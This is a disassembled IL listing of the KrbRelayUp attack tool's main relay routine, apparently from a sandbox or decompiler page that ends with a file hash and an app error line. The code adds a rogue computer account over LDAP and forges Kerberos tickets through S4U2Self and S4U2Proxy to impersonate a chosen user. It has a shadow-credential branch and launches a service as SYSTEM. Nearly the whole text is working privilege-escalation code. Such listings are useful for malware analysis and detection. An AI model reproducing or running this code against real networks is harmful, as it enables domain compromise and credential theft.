KrbRelayUp.Relay.Relay::InitializeCOMServer() ldsfld System.String KrbRelayUp.Options::domainController ldsfld System.Int32 KrbRelayUp.Options::ldapPort newobj System.Void System.DirectoryServices.Protocols.LdapDirectoryIdentifier::.ctor(System.String,System.Int32) newobj System.Void System.DirectoryServices.Protocols.LdapConnection::.ctor(System.DirectoryServices.Protocols.LdapDirectoryIdentifier) stloc.0 <null> ldloc.0 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_Sealing(System.Boolean) ldloc.0 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_Signing(System.Boolean) ldloc.0 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapConnection::Bind() ldsfld KrbRelayUp.Relay.RelayAttackType KrbRelayUp.Options::relayAttackType ldc.i4.1 <null> bne.un IL_0330: call System.Void KrbRelayUp.Relay.Relay::Run() ldsfld System.Boolean KrbRelayUp.Options::rbcdCreateNewComputerAccount brfalse IL_031B: ldloc.0 ldsfld System.String KrbRelayUp.Options::rbcdComputerPassword call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_015E: newobj System.Void System.DirectoryServices.Protocols.AddRequest::.ctor() ldc.i4.s 16 call System.String KrbRelayUp.Program::RandomPasswordGenerator(System.Int32) stsfld System.String KrbRelayUp.Options::rbcdComputerPassword newobj System.Void System.DirectoryServices.Protocols.AddRequest::.ctor() stloc.1 <null> ldloc.1 <null> ldstr CN= ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldstr ,CN=Computers, ldsfld System.String KrbRelayUp.Options::domainDN call System.String System.String::Concat(System.String,System.String,System.String,System.String) callvirt System.Void System.DirectoryServices.Protocols.AddRequest::set_DistinguishedName(System.String) ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr objectClass ldstr Computer newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr SamAccountName ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldstr $ call System.String System.String::Concat(System.String,System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr userAccountControl ldstr 4096 newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr DnsHostName ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String KrbRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr ServicePrincipalName ldc.i4.4 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldstr HOST/ ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String KrbRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr RestrictedKrbHost/ ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String KrbRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr HOST/ ldsfld System.String KrbRelayUp.Options::rbcdComputerName call System.String System.String::Concat(System.String,System.String) stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr RestrictedKrbHost/ ldsfld System.String KrbRelayUp.Options::rbcdComputerName call System.String System.String::Concat(System.String,System.String) stelem.ref <null> newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.Object[]) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr unicodePwd call System.Text.Encoding System.Text.Encoding::get_Unicode() ldstr " ldsfld System.String KrbRelayUp.Options::rbcdComputerPassword ldstr " call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.Byte[]) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.0 <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryResponse System.DirectoryServices.Protocols.DirectoryConnection::SendRequest(System.DirectoryServices.Protocols.DirectoryRequest) pop <null> ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] Computer account " stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $" added with password " stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerPassword stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) leave.s IL_031B: ldloc.0 stloc.2 <null> ldstr [-] Could not add new computer account: call System.Void System.Console::WriteLine(System.String) ldstr [-] ldloc.2 <null> callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) leave IL_07BF: ret ldloc.0 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldsfld System.String KrbRelayUp.Options::domainDN call System.String KrbRelayUp.Program::GetObjectSidForComputerName(System.DirectoryServices.Protocols.LdapConnection,System.String,System.String) stsfld System.String KrbRelayUp.Options::rbcdComputerSid call System.Void KrbRelayUp.Relay.Relay::Run() ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.2 <null> beq.s IL_0352: ldnull ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.4 <null> bne.un IL_07BF: ret ldsfld System.Boolean KrbRelayUp.Options::attackDone brfalse IL_07BF: ret ldnull <null> stloc.3 <null> ldsfld KrbRelayUp.Relay.RelayAttackType KrbRelayUp.Options::relayAttackType ldc.i4.1 <null> bne.un IL_0581: ldsfld KrbRelayUp.Relay.RelayAttackType KrbRelayUp.Options::relayAttackType ldc.i4.0 <null> stloc.s V_4 ldnull <null> stloc.s V_5 ldsfld System.String KrbRelayUp.Options::rbcdComputerPassword call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_03D0: ldsfld System.String KrbRelayUp.Options::rbcdComputerPasswordHash ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldsfld System.String KrbRelayUp.Options::domain callvirt System.String System.String::ToUpper() stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr host stelem.ref <null> dup <null> ldc.i4.2 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerName callvirt System.String System.String::ToLower() stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr . stelem.ref <null> dup <null> ldc.i4.4 <null> ldsfld System.String KrbRelayUp.Options::domain callvirt System.String System.String::ToLower() stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_8 ldc.i4.s 18 ldsfld System.String KrbRelayUp.Options::rbcdComputerPassword ldloc.s V_8 ldc.i4 4096 call System.String KrbRelayUp.Crypto::KerberosPasswordHash(KrbRelayUp.Interop/KERB_ETYPE,System.String,System.String,System.Int32) stloc.s V_5 ldc.i4.s 18 stloc.s V_4 br.s IL_03E7: ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldsfld System.String KrbRelayUp.Options::rbcdComputerPasswordHash call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_03E7: ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldsfld System.String KrbRelayUp.Options::rbcdComputerPasswordHash stloc.s V_5 ldc.i4.s 23 stloc.s V_4 ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldstr $ call System.String System.String::Concat(System.String,System.String) ldsfld System.String KrbRelayUp.Options::domain ldloc.s V_5 ldloc.s V_4 ldnull <null> ldc.i4.0 <null> ldstr ldloca.s V_9 initobj KrbRelayUp.lib.Interop.LUID ldloc.s V_9 ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.0 <null> ldc.i4.1 <null> ldnull <null> call System.Byte[] KrbRelayUp.AskTGT::TGT(System.String,System.String,System.String,KrbRelayUp.Interop/KERB_ETYPE,System.String,System.Boolean,System.String,KrbRelayUp.lib.Interop.LUID,System.Boolean,System.Boolean,System.String,System.Boolean,System.Boolean,System.String) newobj System.Void KrbRelayUp.KRB_CRED::.ctor(System.Byte[]) stloc.s V_6 ldsfld System.Boolean KrbRelayUp.Options::verbose brfalse.s IL_046C: ldloc.s V_6 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGT for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $: stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_6 callvirt System.Byte[] KrbRelayUp.KRB_CRED::get_RawBytes() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_6 ldsfld System.String KrbRelayUp.Options::impersonateUser ldsfld System.String KrbRelayUp.Options::targetSPN ldnull <null> ldc.i4.0 <null> ldstr ldstr ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.s 65 ldnull <null> call KrbRelayUp.KRB_CRED KrbRelayUp.S4U::S4U2Self(KrbRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,System.String,System.Boolean,System.Boolean,System.Boolean,System.String,KrbRelayUp.Interop/KERB_ETYPE,System.String) stloc.s V_7 ldsfld System.Boolean KrbRelayUp.Options::verbose brfalse.s IL_0502: ldloc.s V_6 ldc.i4.s 9 newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String KrbRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr $@ stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String KrbRelayUp.Options::domain stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.7 <null> ldloc.s V_7 callvirt Asn1.AsnElt KrbRelayUp.KRB_CRED::Encode() callvirt System.Byte[] Asn1.AsnElt::Encode() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_6 ldsfld System.String KrbRelayUp.Options::impersonateUser ldsfld System.String KrbRelayUp.Options::targetSPN ldnull <null> ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.4 <null> ceq <null> ldc.i4.0 <null> ceq <null> ldstr ldloc.s V_7 ldc.i4.0 <null> ldnull <null> call System.Byte[] KrbRelayUp.S4U::S4U2Proxy(KrbRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,KrbRelayUp.KRB_CRED,System.Boolean,System.String) stloc.3 <null> ldsfld System.Boolean KrbRelayUp.Options::verbose brfalse IL_0730: ldc.i4 1500 ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String KrbRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String KrbRelayUp.Options::targetSPN stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.5 <null> ldloc.3 <null> call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) br IL_0730: ldc.i4 1500 ldsfld KrbRelayUp.Relay.RelayAttackType KrbRelayUp.Options::relayAttackType ldc.i4.2 <null> beq.s IL_0594: call System.String System.Environment::get_MachineName() ldsfld KrbRelayUp.Relay.RelayAttackType KrbRelayUp.Options::relayAttackType ldc.i4.3 <null> bne.un IL_0730: ldc.i4 1500 call System.String System.Environment::get_MachineName() ldstr $ call System.String System.String::Concat(System.String,System.String) ldsfld System.String KrbRelayUp.Options::domain ldsfld System.String KrbRelayUp.Options::shadowCredCertificate ldsfld System.String KrbRelayUp.Options::shadowCredCertificatePassword ldc.i4.s 18 ldnull <null> ldc.i4.0 <null> ldstr ldsfld System.Boolean KrbRelayUp.Options::verbose stloc.s V_12 ldloca.s V_9 initobj KrbRelayUp.lib.Interop.LUID ldloc.s V_9 ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldloc.s V_12 ldnull <null> call System.Byte[] KrbRelayUp.AskTGT::TGT(System.String,System.String,System.String,System.String,KrbRelayUp.Interop/KERB_ETYPE,System.String,System.Boolean,System.String,KrbRelayUp.lib.Interop.LUID,System.Boolean,System.Boolean,System.String,System.Boolean,System.String) newobj System.Void KrbRelayUp.KRB_CRED::.ctor(System.Byte[]) stloc.s V_10 ldsfld System.Boolean KrbRelayUp.Options::verbose brfalse.s IL_0628: ldloc.s V_10 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGT for stelem.ref <null> dup <null> ldc.i4.1 <null> call System.String System.Environment::get_MachineName() stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $: stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_10 callvirt System.Byte[] KrbRelayUp.KRB_CRED::get_RawBytes() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_10 ldsfld System.String KrbRelayUp.Options::impersonateUser ldsfld System.String KrbRelayUp.Options::targetSPN ldnull <null> ldc.i4.0 <null> ldstr ldstr ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.s 65 ldnull <null> call KrbRelayUp.KRB_CRED KrbRelayUp.S4U::S4U2Self(KrbRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,System.String,System.Boolean,System.Boolean,System.Boolean,System.String,KrbRelayUp.Interop/KERB_ETYPE,System.String) stloc.s V_11 ldsfld System.Boolean KrbRelayUp.Options::verbose brfalse.s IL_06BE: ldloc.s V_11 ldc.i4.s 9 newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String KrbRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr $@ stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String KrbRelayUp.Options::domain stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.7 <null> ldloc.s V_11 callvirt Asn1.AsnElt KrbRelayUp.KRB_CRED::Encode() callvirt System.Byte[] Asn1.AsnElt::Encode() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_11 ldsfld System.String KrbRelayUp.Options::targetSPN ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.4 <null> ceq <null> ldc.i4.0 <null> ceq <null> ldloca.s V_9 initobj KrbRelayUp.lib.Interop.LUID ldloc.s V_9 call System.Byte[] KrbRelayUp.LSA::SubstituteTGSSname(KrbRelayUp.KRB_CRED,System.String,System.Boolean,KrbRelayUp.lib.Interop.LUID) stloc.3 <null> ldsfld System.Boolean KrbRelayUp.Options::verbose brfalse.s IL_0730: ldc.i4 1500 ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String KrbRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String KrbRelayUp.Options::targetSPN stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.5 <null> ldloc.3 <null> call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldc.i4 1500 call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.4 <null> beq.s IL_0749: call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() ldsfld System.Boolean KrbRelayUp.Options::useCreateNetOnly brfalse.s IL_07BA: call System.Void KrbRelayUp.KrbSCM::Run() call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() ldstr krbscm call System.String System.String::Concat(System.String,System.String) stloc.s V_13 ldsfld System.String KrbRelayUp.Options::serviceName call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0788: ldsfld System.String KrbRelayUp.Options::serviceCommand ldloc.s V_13 ldstr --ServiceName " ldsfld System.String KrbRelayUp.Options::serviceName ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_13 ldsfld System.String KrbRelayUp.Options::serviceCommand call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_07AC: ldloc.s V_13 ldloc.s V_13 ldstr --ServiceCommand " ldsfld System.String KrbRelayUp.Options::serviceCommand ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldnull <null> ldnull <null> ldnull <null> ldloc.3 <null> call KrbRelayUp.lib.Interop.LUID KrbRelayUp.Helpers::CreateProcessNetOnly(System.String,System.Boolean,System.String,System.String,System.String,System.Byte[]) pop <null> ret <null> call System.Void KrbRelayUp.KrbSCM::Run() ret <null>
6b6ee63e1b57405281275a7bcfba6f91 (1.11 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙